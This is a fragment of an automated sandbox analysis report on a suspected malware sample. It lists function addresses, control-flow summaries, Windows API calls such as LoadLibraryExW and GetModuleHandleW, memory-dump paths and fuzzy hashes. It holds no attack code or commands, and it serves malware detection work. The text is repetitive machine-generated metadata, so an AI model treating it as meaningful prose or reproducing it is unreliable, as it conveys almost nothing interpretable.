                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: DuplicateHandle
                                                                                                • String ID:
                                                                                                • API String ID: 3793708945-0
                                                                                                • Opcode ID: aaf9330c5cfd102f590a7bccae4d1396b82c7afe778b08eae7922ae1e31648b6
                                                                                                • Instruction ID: f41c3753ced27ec95b7824df49a6899aadd5ae818dee1d53eccc06828be0a31a
                                                                                                • Opcode Fuzzy Hash: aaf9330c5cfd102f590a7bccae4d1396b82c7afe778b08eae7922ae1e31648b6
                                                                                                • Instruction Fuzzy Hash: 7D21F2B59002099FDB10CFAAD584ADEBFF4FB48324F14845AE958A3610D378A944CFA0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 02309580 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 101 2309580-230a6d0 103 230a6d2-230a6d5 101->103 104 230a6d8-230a707 LoadLibraryExW 101->104 103->104 105 230a710-230a72d 104->105 106 230a709-230a70f 104->106 106->105
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0230A509,00000800,00000000,00000000), ref: 0230A6FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 4349b1628cd766df19b39877d19668c8386b2d642ac6cdc22f1bf82b4d87bfb2
                                                                                                • Instruction ID: 1701ee3c6c6ea752cbf76a7eb1c8c478411b38a9f16152d474f6858a3586ce2e
                                                                                                • Opcode Fuzzy Hash: 4349b1628cd766df19b39877d19668c8386b2d642ac6cdc22f1bf82b4d87bfb2
                                                                                                • Instruction Fuzzy Hash: 4111F2B69003098FDB10CF9AD484ADEBBF8AB58324F14842AE559B7640C374A545CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230A68C Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 109 230a68c-230a6d0 111 230a6d2-230a6d5 109->111 112 230a6d8-230a707 LoadLibraryExW 109->112 111->112 113 230a710-230a72d 112->113 114 230a709-230a70f 112->114 114->113
                                                                                                APIs
                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0230A509,00000800,00000000,00000000), ref: 0230A6FA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: 89f78ffd2dc027242eb93e988ed47342c465e99b9135124b8175bf4a13a0e413
                                                                                                • Instruction ID: db9fc1cfaaf28e1994d2906a7ffb3d3e7bc3c60e00f39b198218449c9e76cbaf
                                                                                                • Opcode Fuzzy Hash: 89f78ffd2dc027242eb93e988ed47342c465e99b9135124b8175bf4a13a0e413
                                                                                                • Instruction Fuzzy Hash: 821112B6D003099FDB20CF9AD484ADEFBF8AB58324F14842AE559B7700C379A545CFA5
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230951C Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 117 230951c-230a468 119 230a470-230a49b GetModuleHandleW 117->119 120 230a46a-230a46d 117->120 121 230a4a4-230a4b8 119->121 122 230a49d-230a4a3 119->122 120->119 122->121
                                                                                                APIs
                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,?,0230A25B), ref: 0230A48E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID: HandleModule
                                                                                                • String ID:
                                                                                                • API String ID: 4139908857-0
                                                                                                • Opcode ID: ef64a93083813ecb58b53b3f85cd19b45dfe43de92c366d9830b3c4605170545
                                                                                                • Instruction ID: 048b28eaa9a3ff644da727d5de4477eb39e873477ad691463b34d98b0ad5f640
                                                                                                • Opcode Fuzzy Hash: ef64a93083813ecb58b53b3f85cd19b45dfe43de92c366d9830b3c4605170545
                                                                                                • Instruction Fuzzy Hash: 911126B5D003498FDB20CF9AD484ADEFBF4EB48224F10841AD919B7700D374A545CFA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD006 Relevance: .1, Instructions: 78COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 47237eb55bfb6ad3d726c0ef58252aac7ecf73a229de0e42a0164cd37a4e3f5a
                                                                                                • Instruction ID: 482a207b334bbd5ab42e84a0bc21dbefed51db3ad2d4b76634a72931635d7b98
                                                                                                • Opcode Fuzzy Hash: 47237eb55bfb6ad3d726c0ef58252aac7ecf73a229de0e42a0164cd37a4e3f5a
                                                                                                • Instruction Fuzzy Hash: 04315C7550E3C49FD713CB24D990B11BF75AB46214F2985EBD8848B6A3C33A981ACB62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009BD414 Relevance: .1, Instructions: 75COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577320853.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9bd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 0cbe8ceb5220f3fd6f4c42f7e84d10320d2c1f43f1160d27a03e5be649da62ca
                                                                                                • Instruction ID: e7a25c1efa9a2d67b926087db2ca74d40267cd42c95d879d92a13dc487a9dedf
                                                                                                • Opcode Fuzzy Hash: 0cbe8ceb5220f3fd6f4c42f7e84d10320d2c1f43f1160d27a03e5be649da62ca
                                                                                                • Instruction Fuzzy Hash: F6214571500240EFDB01CF14CAC0F66BF66FB84334F24C569E8090B2A6D33AE846DBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD1E8 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: f909910e517f66dd648e749f26202a44d2c540790bb11eb708e78c8e79a18582
                                                                                                • Instruction ID: ea668aab932c9a49bf6e18208c66c2009b29ecbe4f68ff9f54e7c7e7f881eb8a
                                                                                                • Opcode Fuzzy Hash: f909910e517f66dd648e749f26202a44d2c540790bb11eb708e78c8e79a18582
                                                                                                • Instruction Fuzzy Hash: A421F575904240EFDB01CF54D5C4F26FBA9FB94314F24C97DE8094B246C37AD846CAA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD2E8 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 17fe13a88522882ab0630ac9c4d8f4d288e30326605472378f235ed79dc85dc6
                                                                                                • Instruction ID: 255ef51b610064405e3124c03c43eb75c7af0195fdf9c538cafff606eda2fb78
                                                                                                • Opcode Fuzzy Hash: 17fe13a88522882ab0630ac9c4d8f4d288e30326605472378f235ed79dc85dc6
                                                                                                • Instruction Fuzzy Hash: F5212975905284DFDB01DF14D9C0F2ABB69FB84328F24C97EE8490B246C33AD806C6A3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD3C8 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 09101a69148a53b87f37d608c9804b1bc3cf1756f5e7649f042002612711d2a0
                                                                                                • Instruction ID: 5c0a8ab542b5909c5cbfe088481d82aa54ae72716cc441fc1e2df7ce3699e800
                                                                                                • Opcode Fuzzy Hash: 09101a69148a53b87f37d608c9804b1bc3cf1756f5e7649f042002612711d2a0
                                                                                                • Instruction Fuzzy Hash: 582126B5904244DFDB05CF14D8C0F26BB69FB84324F24C97DE9490B692C33AE846CAA3
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD030 Relevance: .1, Instructions: 72COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 124a839663298035c04c055de7635b6ed13b591bfc040b5902567d5f03235c14
                                                                                                • Instruction ID: 5ffc005545028dd2ea70d63f402ffb2294fe26f33bbe3d7660129ca53855747d
                                                                                                • Opcode Fuzzy Hash: 124a839663298035c04c055de7635b6ed13b591bfc040b5902567d5f03235c14
                                                                                                • Instruction Fuzzy Hash: 9021F275904244EFDB15DF18D9C0F26BBA5FB84314F24CA7EE8494B246C33AD846CA62
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009BD40F Relevance: .1, Instructions: 56COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577320853.00000000009BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009BD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9bd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                                • Instruction ID: 4a129c0c6ca2c262d5192c1a32ef74eb8b76e9f80d44823ff481b475df31cc9b
                                                                                                • Opcode Fuzzy Hash: 592ece47119f67d140ea7e82aae040392f4fe946fa5bf8865279594dce73126f
                                                                                                • Instruction Fuzzy Hash: 66112976504280DFCB12CF00D6C0B56BF72FB84324F24C2A9D8480B666C33AE856CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD1E3 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 9987972c5ad5a0bbdfc3a90a2c4a8b6c80251489d692dd004c95719536adb841
                                                                                                • Instruction ID: 801a0baa17871fa0ae47d757fdbf480bb924d5016fe3a21fd08fc19d40234be4
                                                                                                • Opcode Fuzzy Hash: 9987972c5ad5a0bbdfc3a90a2c4a8b6c80251489d692dd004c95719536adb841
                                                                                                • Instruction Fuzzy Hash: A3119075904280DFDB12CF14D5C4B15BFB1FB84314F28C6AED8494B656C33AD84ACB52
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD2E3 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0cd92d4669eb3f0ae16ff5fe36c088554c4477bda88b587c2e791696761bb80
                                                                                                • Instruction ID: 8f73d7997655bef85ad5365d59dc690b6c13244d6d008a0bc4314ac76ab55100
                                                                                                • Opcode Fuzzy Hash: a0cd92d4669eb3f0ae16ff5fe36c088554c4477bda88b587c2e791696761bb80
                                                                                                • Instruction Fuzzy Hash: 98119076905284DFDB12CF14D5C4B19BB71FB84324F24C6AED8484B646C33AD846CBA2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009CD3C3 Relevance: .1, Instructions: 53COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577368075.00000000009CD000.00000040.00000800.00020000.00000000.sdmp, Offset: 009CD000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_9cd000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: a0cd92d4669eb3f0ae16ff5fe36c088554c4477bda88b587c2e791696761bb80
                                                                                                • Instruction ID: 31262c5adda1d8389c048abfaf17cbeeac2bd3417bbfc315305c9fc0a6bf2c4e
                                                                                                • Opcode Fuzzy Hash: a0cd92d4669eb3f0ae16ff5fe36c088554c4477bda88b587c2e791696761bb80
                                                                                                • Instruction Fuzzy Hash: 4311E276904280CFCB16CF10D5C0B15FB71FB84324F24C6AED9494B656C33AE80ACB92
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Non-executed Functions

                                                                                                Function 0230F3D0 Relevance: .3, Instructions: 315COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 62581c2570b4269eb1b4a4b3f2a6893269695dc5e07024e3b5c94182b36a00a2
                                                                                                • Instruction ID: 4c8fcee26f0b9405610c0fc44c30957bf63097fca180c09a0565e6f6719a2315
                                                                                                • Opcode Fuzzy Hash: 62581c2570b4269eb1b4a4b3f2a6893269695dc5e07024e3b5c94182b36a00a2
                                                                                                • Instruction Fuzzy Hash: C712B4F1B1A746AAD710CF65E4881893FA1FF41338F924228D2615EAD1D7BC196ACFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230CDD4 Relevance: .3, Instructions: 265COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: cec60c6a7367e6b9a1ea70d2a078fdb74806e75630c0d80062007e52c3a931db
                                                                                                • Instruction ID: e9fbdb4f68d64d5f0b96a0cd377dcaa07ca276e8368393e0d05cd08c763b22b6
                                                                                                • Opcode Fuzzy Hash: cec60c6a7367e6b9a1ea70d2a078fdb74806e75630c0d80062007e52c3a931db
                                                                                                • Instruction Fuzzy Hash: 5AA19D32E0021ACFCF15DFB4C89459EBBB2FF84700B15856AE805BB2A1DB35A955CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0230F3C0 Relevance: .2, Instructions: 222COMMON
                                                                                                Download Yara Rule
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.577667065.0000000002300000.00000040.00000800.00020000.00000000.sdmp, Offset: 02300000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_2300000_S3zoj9Uts0.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: b24d3aa2111a7dd01cba43b59f114120c74d65e0aac82258724b4183bfe83848
                                                                                                • Instruction ID: 7213bed3ce4e60d2fcc95c140472897645664ad6e0c82f807134c062232ccf9e
                                                                                                • Opcode Fuzzy Hash: b24d3aa2111a7dd01cba43b59f114120c74d65e0aac82258724b4183bfe83848
                                                                                                • Instruction Fuzzy Hash: 25C106B1F1A746AAD710CF64E8881893FA1FF85338F524228D1616F6D1D7B8186ACFC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%